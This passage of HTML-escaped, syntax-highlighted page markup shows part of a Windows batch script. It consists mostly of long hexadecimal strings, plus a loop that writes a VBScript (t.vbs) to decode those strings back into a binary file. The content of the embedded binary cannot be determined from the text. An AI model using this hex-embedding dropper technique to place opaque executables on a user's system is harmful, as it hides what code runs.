-moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"81BB5100824FFD513C9D918C12EAAB14BC95937103091F21E00308EE8AEA147832A5BD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5C635F874E890605300DD445717D8AE6055004FD53E46A5406B0B942838C5F44B79473"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"34FBD845262FD8772F8B6023712C5FE523E2584CB81726F832C54A15182DF0E84FC3F8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6E5D17A79B09BE7CABEEB4DE6470B33CFF2C7560B9E2D3E26E33971F85A70B34F933C5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E7FB42FE4CD105C2E014BDC3900E5D3FDD262816B768658A7BCFA2D3E1E5B3BAB49F4D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"520D00731BE281FC9AF714CD181A7339F826AA8CBAF4CC04F51A808E3BCEF9AE7D7A0D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1B61EF3460789FDD93472578A6C1F235CAC0FCF3742FC5D94565CD3BC5677FF4450CA2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8FACB8EABFFA867EF2AE3EEF5D7C070A828279067FBF7CA6D01065B07C89431CFA56F4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CBA77489CBE431F1AEE51BBCF932BD19D073B7FFAE98D7FC9DE0938F22AE14A7498053"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CF7DF89C3F275A73809D22CE560C60987F729B623D515C51ACE63D5661D0F34F9F1737"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"CE5899672F7719F83CD5348C5C180C6FB274A3E7DE04590B8F68C47D2B7AEEF5545BC9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7B2E5EF5BE8FE4DBE2C137C15C6913C4737601A3CED5F23B713D1CD2A0E16F3BE02E94"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"BA0B65EE4279077D037BCC5B7846FE25F134B88ACB978916689689DBA8D4F3D1F43D4C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"999E0FEB44CBC8819296B15F96BBAAA5C477D4A5ECDADD362EBC845F23429497F0BF81"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9C917F17ECD498A65CB1AC844F14DB057239D271EE4E11C4C781E06DC471ABE4EA1269"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"433F978367305D3F4AECB25BB93E2E5BC90E82734B4F8726965D7B34D4C87F70557CBA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8CC7740B5D5BC009FEC11AC1371D131F9BC0EA76DDA1244021800244E28A23289D2AE9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"1A90829B49203AC897C1A25D2677E728DDF9722E5F5A38E66428B74AD67294B1704BA4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AFE31BF29A7DCE5B981C2DAE1D265D8B6F03312A2D0A06335F8BDBB84C9C163F4CC1DC"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E849D1E2EA60A2E1328130E15AFCAE05BE2146C2083BDDB55FBE82DF814E42B8B1D52E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"37F2BFC7E061CE589AA3AF61E0BFA607AC58194CB3478126FDA8DA20053D7C8FCCBD4A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A6B8EF1275B0F0F09CBA40AA68E9C44F597851AD64968BA8CEA7A88AAF845374C557C2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"29AEDE576A0BE427C9C9E04F7B3C378B4BC02838E5BCFA8818563D812D56C93C5BA0D9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"67C1A7A3CE760DBC9377B78DDBEFD92ACEEF76717E51E2FC4CD08C5B26D5144AD9A55C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B806CF0C14C8ABB965C1D59AC260560DB970C885B38B20170AB950360E7201900B6067"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"404E0E39393BA99A8366324F0842239A606607B755B9446390E2B4EFC573843EFF2C02"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B7003DFDFE4706815CE621C2BF34342222F8344ED932C08651B78A3A997DA6FCD68C54"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"135F7C44F4D0869879461A851EE8A42F63982C483E74C75A7E1295B39C9E18FCE463EF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E0631E68FA864D16CF0AABAC52FEC2473ED07120916EB4E556297D8F8C1E751805768B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0876CCC3061FD0B35786813E711DA0520AF4E4903FD0793F0BF4C111A08523404FEAE4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"27A37C408329D0E651403F3EF67340537C4065FCC50F87817EA6937F4681CA2C289F08"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"74D128A05B7D4047D114F7905503E0CBF0677EA4608DFC006E43E1238BC3624D1E7DF7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5EDE30D568A48F713BC533954C7081A6516EFF067ECAD969BEE9C8E8C87FBFE23FF20D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"57E8C86587C63E78E0AD3F8E08502C7DBA286F988E8E3D7D5388AF1B35D2D75C4779E9"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"982745F4618C7990A0CAA22FD3E1A1CF8B3FFAA892020E37A8B8305077A083F09DFD60"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4EAF741B659A7C391BE85E26179649F5FC5D57BC47556F3F4AF723C7202A6EE1E0034E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"911E539B364A71A2788C4D29D8E4BC0DB74D03C47399E374AB12BB4DF1750BC53E893F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FAFA8C3B54C28FC31A7C2A57286DBA4C1FBDC8F00A107AB86CF9753A5EBA3CDC514E07"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0C20ECC5EB373F7879FC29D5FDFC941EBEFC3FA1845733204E09C3209689203C30BB37"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"70729A7799606055B0E764CB21608D5EEAB6C991176340D168588420BFEC75E911F056"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B02E86BD385DCD0146AAE96057A91B23C453B45419B97510B54764ABB74821073E6C06"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"31F17F3F2C06B37266AEBB4CEADE22F3DCD23A93A8CB648E9B5AB7C8416FC19275DD42"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0CFC76B161081D29C25D26F3BECEDA20E7078FF9B6B0475BB6E179560FD2794EF7914A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E9ED0BD4423F50A4D6B83DE78B3D67FA7A4E114D87B7F3B7C39D23C6EBFCDD25AF8390"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2DBD0EEBDFBF343E0F5FBD0EEBF159A65C3FAC5B5F1F1CFB24D1AF89A829FFE3E79A88"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"7ACFF1734D442DA61F1C7BD87EF865E261FB319FB6F152F1B010D7AF1C79CF79D02FDF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E797D7D3F746D11BC697963FF25EB1DC309D481E9C2E7E87C777BFD3EFFEA499441237"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"73F4FD8FFDEE67CD2292DC59A3EFFBC32F892592F2D8EBF73F3897488E43DA7E1BBE2F"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2CFE45DD2E7E0FEC51BFBA5EA89361DDDA91BA374AA16E122177F8D55597017C68B7DD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; 